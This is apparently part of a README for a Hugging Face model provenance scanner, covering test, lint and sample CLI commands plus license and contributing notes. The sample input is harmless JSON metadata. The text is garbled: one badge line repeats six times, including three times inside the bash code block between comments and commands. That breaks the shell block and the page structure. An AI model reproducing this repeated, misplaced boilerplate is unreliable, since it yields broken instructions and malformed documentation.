[![CI](https://github.com/poojakira/hf-model-provenance-scanner/actions/workflows/ci.yml/badge.svg)](https://github.com/poojakira/hf-model-provenance-scanner/actions/workflows/ci.yml) [![Python 3.11+](https://img.shields.io/badge/python-3.11+-blue.svg)](https://www.python.org/) [![License: MIT](https://img.shields.io/badge/License-MIT-yellow.svg)](LICENSE) [![Release](https://img.shields.io/github/v/release/poojakira/hf-model-provenance-scanner)](https://github.com/poojakira/hf-model-provenance-scanner/releases)


```bash
# Run tests

[![CI](https://github.com/poojakira/hf-model-provenance-scanner/actions/workflows/ci.yml/badge.svg)](https://github.com/poojakira/hf-model-provenance-scanner/actions/workflows/ci.yml) [![Python 3.11+](https://img.shields.io/badge/python-3.11+-blue.svg)](https://www.python.org/) [![License: MIT](https://img.shields.io/badge/License-MIT-yellow.svg)](LICENSE) [![Release](https://img.shields.io/github/v/release/poojakira/hf-model-provenance-scanner)](https://github.com/poojakira/hf-model-provenance-scanner/releases)

python -m pytest tests/ -v

# Lint

[![CI](https://github.com/poojakira/hf-model-provenance-scanner/actions/workflows/ci.yml/badge.svg)](https://github.com/poojakira/hf-model-provenance-scanner/actions/workflows/ci.yml) [![Python 3.11+](https://img.shields.io/badge/python-3.11+-blue.svg)](https://www.python.org/) [![License: MIT](https://img.shields.io/badge/License-MIT-yellow.svg)](LICENSE) [![Release](https://img.shields.io/github/v/release/poojakira/hf-model-provenance-scanner)](https://github.com/poojakira/hf-model-provenance-scanner/releases)

ruff check src/ tests/

# Run the CLI against a sample payload

[![CI](https://github.com/poojakira/hf-model-provenance-scanner/actions/workflows/ci.yml/badge.svg)](https://github.com/poojakira/hf-model-provenance-scanner/actions/workflows/ci.yml) [![Python 3.11+](https://img.shields.io/badge/python-3.11+-blue.svg)](https://www.python.org/) [![License: MIT](https://img.shields.io/badge/License-MIT-yellow.svg)](LICENSE) [![Release](https://img.shields.io/github/v/release/poojakira/hf-model-provenance-scanner)](https://github.com/poojakira/hf-model-provenance-scanner/releases)

echo '{"repo_id":"Open-OSS/privacy-filter","author":"Open-OSS","files":["loader.py"],"downloads_24h":244000,"author_repo_count":0,"created_at":"2026-05-14T00:00:00Z"}' \
  | python -m hf_scanner.scanner
```

---

## License

[![CI](https://github.com/poojakira/hf-model-provenance-scanner/actions/workflows/ci.yml/badge.svg)](https://github.com/poojakira/hf-model-provenance-scanner/actions/workflows/ci.yml) [![Python 3.11+](https://img.shields.io/badge/python-3.11+-blue.svg)](https://www.python.org/) [![License: MIT](https://img.shields.io/badge/License-MIT-yellow.svg)](LICENSE) [![Release](https://img.shields.io/github/v/release/poojakira/hf-model-provenance-scanner)](https://github.com/poojakira/hf-model-provenance-scanner/releases)


MIT โ€” see [LICENSE](LICENSE).

---

## Contributing

[![CI](https://github.com/poojakira/hf-model-provenance-scanner/actions/workflows/ci.yml/badge.svg)](https://github.com/poojakira/hf-model-provenance-scanner/actions/workflows/ci.yml) [![Python 3.11+](https://img.shields.io/badge/python-3.11+-blue.svg)](https://www.python.org/) [![License: MIT](https://img.shields.io/badge/License-MIT-yellow.svg)](LICENSE) [![Release](https://img.shields.io/github/v/release/poojakira/hf-model-provenance-scanner)](https://github.com/poojakira/hf-model-provenance-scanner/releases)


Pull requests welcome. Please add tests for any new check.  
Read [CONTRIBUTING.md](CONTRIBUTING.md) before opening a PR.